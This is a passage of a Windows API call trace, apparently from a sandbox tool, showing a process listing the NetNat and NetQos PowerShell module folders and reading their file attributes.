ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetNatSession.cdxml", cAlternateFileName="")) returned 1 [0265.110] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x118d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetNatStaticMapping.cdxml", cAlternateFileName="")) returned 1 [0265.110] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetNat.psd1", cAlternateFileName="")) returned 1 [0265.110] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0265.111] FindClose (in: hFindFile=0x1a8dbce0 | out: hFindFile=0x1a8dbce0) returned 1 [0265.111] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0265.111] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0265.111] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetNat", nBufferLength=0x105, lpBuffer=0x1b81e100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetNat", lpFilePart=0x0) returned 0x39 [0265.111] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e540) returned 1 [0265.111] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetNat" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netnat"), fInfoLevelId=0x0, lpFileInformation=0x1b81e620 | out: lpFileInformation=0x1b81e620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0265.111] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e500) returned 1 [0265.111] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e570) returned 1 [0265.111] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetNat", nBufferLength=0x105, lpBuffer=0x1b81e060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetNat", lpFilePart=0x0) returned 0x39 [0265.111] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetNat\\", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetNat\\", lpFilePart=0x0) returned 0x3a [0265.111] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetNat\\*", lpFindFileData=0x1b81e210 | out: lpFindFileData=0x1b81e210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0265.112] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.112] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1725, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetNat.cdxml", cAlternateFileName="")) returned 1 [0265.112] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ca9, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetNat.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.112] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetNat.Types.ps1xml", cAlternateFileName="")) returned 1 [0265.112] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd51, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetNatExternalAddress.cdxml", cAlternateFileName="")) returned 1 [0265.112] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x502, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetNatGlobal.cdxml", cAlternateFileName="")) returned 1 [0265.113] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetNatSession.cdxml", cAlternateFileName="")) returned 1 [0265.113] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x118d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetNatStaticMapping.cdxml", cAlternateFileName="")) returned 1 [0265.113] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetNat.psd1", cAlternateFileName="")) returned 1 [0265.113] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetNat.psd1", cAlternateFileName="")) returned 0 [0265.114] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0265.114] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e4c0) returned 1 [0265.114] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e480) returned 1 [0265.114] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetNat\\NetNat.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netnat\\netnat.psd1")) returned 0x20 [0265.115] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0265.115] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetQos", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetQos", lpFilePart=0x0) returned 0x39 [0265.115] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetQos\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetQos\\", lpFilePart=0x0) returned 0x3a [0265.115] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetQos\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa550297, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa550297, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0265.115] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa550297, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa550297, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.115] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe453998, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe453998, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe453998, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xed31, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetQosPolicy.cdxml", cAlternateFileName="")) returned 1 [0265.116] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe453998, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe453998, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe453998, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x249, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetQosPolicy.Format.Helper.psm1", cAlternateFileName="")) returned 1 [0265.116] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe453998, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe453998, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe453998, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1bce, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetQosPolicy.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.116] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe453998, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe453998, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe453998, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2fcd, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetQosPolicy.Types.ps1xml", cAlternateFileName="")) returned 1 [0265.116] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe453998, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe453998, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe453998, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x289, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetQos.psd1", cAlternateFileName="")) returned 1 [0265.116] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe453998, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe453998, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe453998, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x289, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetQos.psd1", cAlternateFileName="")) returned 0 [0265.116] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0265.116] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0265.116] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0265.117] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0265.117] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetQos", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetQos", lpFilePart=0x0) returned 0x39 [0265.117] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetQos\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetQos\\", lpFilePart=0x0) returned 0x3a [0265.117] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetQos\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa550297, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa550297, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0265.117] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa550297, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa550297, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.117] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe453998, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe453998, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe453998, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xed31, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetQosPolicy.cdxml", cAlternateFileName="")) returned 1 [0265.117] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe453998, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe453998, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe453998, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x249, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetQosPolicy.Format.Helper.psm1", cAlternateFileName="")) returned 1 [0265.117] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe453998, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe453998, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe453998, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1bce, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetQosPolicy.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.118] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe453998, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe453998, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe453998, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2fcd, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetQosPolicy.Types.ps1xml", cAlternateFileName="")) returned 1 [0265.118] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe453998, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe453998, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe453998, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x289, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetQos.psd1", cAlternateFileName="")) returned 1 [0265.118] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0265.118] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0265.118] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0265.118] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0265.118] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetQos", nBufferLength=0x105, lpBuffer=0x1b81e100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetQos", lpFilePart=0x0) returned 0x39 [0265.118] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e540) returned 1 [0265.118] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetQos" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netqos"), fInfoLevelId=0x0, lpFileInformation=0x1b81e620 | out: lpFileInformation=0x1b81e620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa550297, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa550297, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0265.118] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e500) returned 1 [0265.118] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e570) returned 1 [0265.119] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetQos", nBufferLength=0x105, lpBuffer=0x1b81e060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetQos", lpFilePart=0x0) returned 0x39 [0265.119] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetQos\\", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetQos\\", lpFilePart=0x0) returned 0x3a [0265.119] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetQos\\*", lpFindFileData=0x1b81e210 | out: lpFindFileData=0x1b81e210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa550297, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa550297, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0265.119] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa550297, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa550297, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.119] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe453998, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe453998, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe453998, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xed31, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetQosPolicy.cdxml", cAlternateFileName="")) returned 1 [0265.119] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe453998, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe453998, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe453998, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x249, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetQosPolicy.Format.Helper.psm1", cAlternateFileName="")) returned 1 [0265.120] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe453998, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe453998, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe453998, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1bce, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetQosPolicy.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.120] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe453998, ftCreationTime.dwHighDateTime=0x1d112e3, 